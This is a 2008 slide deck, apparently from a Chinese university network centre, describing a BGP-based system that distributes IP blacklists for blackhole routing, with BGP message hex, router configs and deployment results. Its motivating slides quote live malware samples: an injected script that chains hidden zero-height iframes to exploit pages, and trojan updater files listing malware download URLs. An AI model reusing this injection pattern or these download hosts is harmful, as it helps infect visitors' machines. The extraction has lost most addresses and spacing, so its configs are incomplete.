基于BGP協議的

IP黑名單分發系統張煥杰Email/msn:james@

中國科學技術大學網絡信息中心2008-12-192024/9/231基于BGP協議的IP黑名單分發系統主要內容IP黑名單介紹基于BGP協議的IP黑名單分發系統結構接收黑名單的路由器配置測試情況結語2024/9/232基于BGP協議的IP黑名單分發系統IP黑名單介紹IP黑名單（IPblacklist）是指被設置成禁止通信的IP地址。管理完備的網絡中，往往會設置IP黑名單列表。發往IP黑名單的數據包，不會被正常地轉發被丟棄（稱為blackholeroute，即黑洞路由，一般是送到Null0空接口）或發送到特殊的目的地（稱為sinkhole路由，送到專門的流量處理設備進一步處理）。IP黑名單的應用，可以顯著的減輕DDoS攻擊的危害，也可以減慢網絡蠕蟲的傳播。2024/9/233基于BGP協議的IP黑名單分發系統IP黑名單介紹（2）如最近年很多校園網都受到很多木馬程序的影響。目前反向連接的木馬占主流，并且多采用被動傳播方式。木馬下載網站是木馬傳播的主要途徑，木馬程序利用網站做跳板傳播或更新。一旦把這些網站IP地址添加到IP黑名單，禁止正常計算機與它的通信，這些木馬程序的傳播就無法進行，很快就能抑制住校園網內木馬程序的傳播，ARP欺騙等影響網絡穩定的事件在校園網明顯減少。同樣可以減少黃色網站、釣魚網站等的影響。2024/9/234基于BGP協議的IP黑名單分發系統惡意網站的實例內嵌惡意代碼的網站多用于被動傳播木馬瀏覽器訪問時，如果存在漏洞，會自動下載木馬軟件等惡意軟件，在用戶后臺執行通常利用flash、realplayer、windows下的漏洞這些網站往往會被嵌入到正常的網站上，俗稱被“掛馬”惡意代碼中轉站為了幫助木馬程序的更新，設立一些下載網站，木馬程序啟動后，自動下載最新的程序代碼2024/9/235基于BGP協議的IP黑名單分發系統一個“掛馬”例子深圳職業技術學院汽車與交通學院http:///ReadNews.asp?NewsID=809這個網頁中有下面一段代碼<scriptsrc=/1.js>1.js內容是<iframe

src=/a0076159/a07.htmwidth=100height=0></iframe>/a0076159/a07.htm的內容是<iframewidth=100height=0src=new.html></iframe>new.html是利用幾個媒體播放漏洞下載惡意軟件的代碼2024/9/236基于BGP協議的IP黑名單分發系統一個“掛馬”例子[wide]/[script]/ads/gb.js[frame]/a11.html[frame]/index.html[frame]/fl.htm[frame]/i11.html[frame]/cx.htm[object]/bak.css[frame]/06014.htm[object]/bak.css[frame]/I7.htm[object]/yg.exe[frame]/ff.htm[object]/bak.css[frame]/real10.htm[object]/bak.css[frame]/real11.htm[object]/bak.css[script]/855299/ystat.js最近利用IE70day攻擊的惡意程序2024/9/237基于BGP協議的IP黑名單分發系統一個網站被掛了多個“馬”LogisgeneratedbyFreShow.

[wide]/

[script]/include/javascript/common.js

[frame]/b7.htm?a023

[frame]/flash.htm

[frame]/14.htm

[frame]/office.htm

[frame]/lz.htm

[frame]/re10.htm

[frame]/re11.htm

[frame]/fs/7.htm

[frame]/a192/fxx.htm

[frame]/a192/fx.htm

[frame]/a192/ilink.html

[frame]/a192/flink.html

[frame]/a192/ss.html

[frame]/a192/ms06014.htm

[frame]/a192/GLWORLD.html

[frame]/sina.htm

[frame]/UU.htm

[frame]/a192/Thunder.html

[frame]/a192/real.htm

[frame]/a192/Real.html2024/9/238基于BGP協議的IP黑名單分發系統惡意代碼中轉站感染病毒的機器會下載/1234.txt

這個文件內容是

[oo]

c0=http://1.111991.net/0.exe

c1=http://1.111991.net/1.exe

c2=http://1.111991.net/2.exe

c3=http://1.111991.net/3.exe

c4=http://1.111991.net/4.exe

c5=http://1.111991.net/5.exe

c6=http://1.111991.net/6.exe

c7=http://1.111991.net/7.exe

c8=http://1.111991.net/8.exe2008年5月5日開始關注類似的訪問序列2024/9/239基于BGP協議的IP黑名單分發系統惡意代碼中轉站(2)http:///ko.txt內容是：[file]open=yurl1=http://111./new/new1.exeurl2=http://111./new/new2.exeurl3=http://111./new/new3.exeurl4=http://111./new/new4.exeurl5=http://111./new/new5.exeurl6=http://111./new/new6.exe2024/9/2310基于BGP協議的IP黑名單分發系統獲取以上信息的方式某些安全論壇，如

/bbs/forum-31-1.html

/forumdisplay.php?fid=22http:///report.asp從校園網對外訪問的日志中分析查找訪問較明顯序列的日志，如1.exe2.exe3.exe發現可疑的URL，可以把下載的文件提交給

/

測試，檢查是否是惡意軟件通過以上方式,經過幾個月的累計,我們已經搜集了700余條IP黑名單2024/9/2311基于BGP協議的IP黑名單分發系統惡意網站的一般封堵方法客戶端封堵某些瀏覽器或個人防火墻在訪問惡意網站的時候，會給出提示，并阻擋訪問校園出口封鎖防火墻檢測到下載惡意軟件時可以阻擋IPS入侵防御系統可以阻斷管理員手工增加黑名單路由，更新復雜，維護成本高網絡主干封鎖增加黑名單路由，發往這些地方的數據包被丟棄教育網主干增加了約150條黑名單路由，禁止對這些IP的訪問但由于大部分學校都用其他出口，因此封堵效果一般2024/9/2312基于BGP協議的IP黑名單分發系統教育網主干網黑名單路由例子hef1-bgw>showiproute|incB9[200/70]via,2d11hB96[200/70]via,2d11hB19[200/70]via,2d11hB36[200/70]via,2d11hB36/32[200/70]via,2d11hB04/32[200/70]via,2d11hB89/32[200/70]via,2d11hB13/32[200/70]via,2d11hB32[200/70]via,2d11hB34/32[200/70]via,2d11hB3/32[200/70]via,2d11h2024/9/2313基于BGP協議的IP黑名單分發系統在路由器上封鎖IP的方式首先在路由器上增加null0路由iproute55null0把要封鎖IP的下一跳設置為,如要封鎖3,有兩種方式直接手工增加靜態路由

iproute355

需要在所有路由器上增加利用BGP注入路由（遠程觸發黑洞路由，Remote-TriggeredBlackHoleRouting

）在一個觸發路由器上增加，利用BGP廣播給其他路由器做法可以參考/3c6vl7

（WormMitigationTechnicalDetails

）2024/9/2314基于BGP協議的IP黑名單分發系統遠程觸發黑洞路由優缺點優點在一臺觸發路由器上配置，自動廣播到其他路由器，使用方便數據包是在最近的路由器上丟棄缺點手工修改配置比較麻煩無法有效的跟蹤相關信息(如：什么時候增加的，增加的原因)無法自動刪除黑名單，必須要手工刪除總之，管理員比較辛苦2024/9/2315基于BGP協議的IP黑名單分發系統基于BGP協議的

IP黑名單分發系統黑名單信息存放在數據庫中黑名單信息管理方式管理員通過Web界面添加/刪除黑名單程序與入侵檢測系統自動進行添加/刪除管理員在添加時可以設置有效期，到期后自動刪除通過一個簡單的BGP客戶端，把數據庫里的黑名單信息發送給路由器剩下的操作與傳統遠程觸發黑洞路由完全一樣2024/9/2316基于BGP協議的IP黑名單分發系統系統結構WEB界面管理數據庫路由服務器路由器BGP協議管理員BGP協議2024/9/2317基于BGP協議的IP黑名單分發系統簡化的BGP客戶端程序BGP很復雜，但是BGP的協議很簡單每條消息不能超過4096字節消息頭固定19字節4種消息類型OPEN建立tcp連接后發送，協商一些參數UPDATE增加或撤回路由NOTIFICATION出錯時KEEPALIVE定時發送2024/9/2318基于BGP協議的IP黑名單分發系統UPDATE廣播增加路由信息例如增加一條路由73/32003802

消息長度56(0x38)字節，類型UPDATE(02)0000Withdraw信息長度為0(無withdaw路由)001CTotalPathAttributeLength=28(0x1c)字節400100ORIGIN:IGP400200ASPATH:空400304C0000201NEXT_HOP:8004040000

0014MED204005040000

0054

Local_Pref10020前綴長度32DEBFFBAD732024/9/2319基于BGP協議的IP黑名單分發系統UPDATE廣播撤回路由信息例如撤回一條路由73/32001C02

消息長度28(0x1c)字節，類型UPDATE(02)0005WithdrawnRoutesLength=520

前綴長度32DEBFDBAD730000TotalPathAttributeLength=0字節2024/9/2320基于BGP協議的IP黑名單分發系統接收黑名單的路由器配置WEB界面管理數據庫路由服務器路由器BGP協議BGP協議備用路由服務器BGP協議2024/9/2321基于BGP協議的IP黑名單分發系統接收IP黑名單路由器上的配置routerbgp65500

nosynchronization

bgplog-neighbor-changes

neighbor7remote-as24362

neighbor7ebgp-multihop255

neighbor41remote-as24362

neighbor41ebgp-multihop255

noauto-summaryiproute55Null0iproute755next_hopiproute4155next_hop注：65500是自治域號，隨便使用一個號就可以Next_hop是到741的網關741是路由服務器IP2024/9/2322基于BGP協議的IP黑名單分發系統BGP連接正常的信息#showip

bgpneighborsBGPneighboris7,remoteAS24362,externallinkBGPversion4,remoterouterID7BGPstate=Established,upfor6d01h…SentRcvdPrefixactivity:--------PrefixesCurrent:0699(Consumes33552bytes)PrefixesTotal:0700ImplicitWithdraw:00ExplicitWithdraw:01Usedasbestpath:n/a6602024/9/2323基于BGP協議的IP黑名單分發系統BGP連接正常的信息(2)#showip

bgpBGPtableversionis703,localrouterIDis1Statuscodes:ssuppressed,ddamped,hhistory,*valid,>best,i-internal,SStaleOrigincodes:i-IGP,e-EGP,?-incompleteNetworkNextHopMetricLocPrfWeightPath*43/32024362i*>024362i*7/32024362i*>024362i*0/32024362i*>024362i*1/32024362i*>024362i2024/9/2324基于BGP協議的IP黑名單分發系統測試情況2008年7月開始在中國科大校園網使用這樣方式來管理黑名單，有安徽4所大學,省外3所(東北大學、蘭州大學、電子科大）在使用這個黑名單目前封鎖了700個IPhttp:///至今運行穩定節省了各個學校自己維護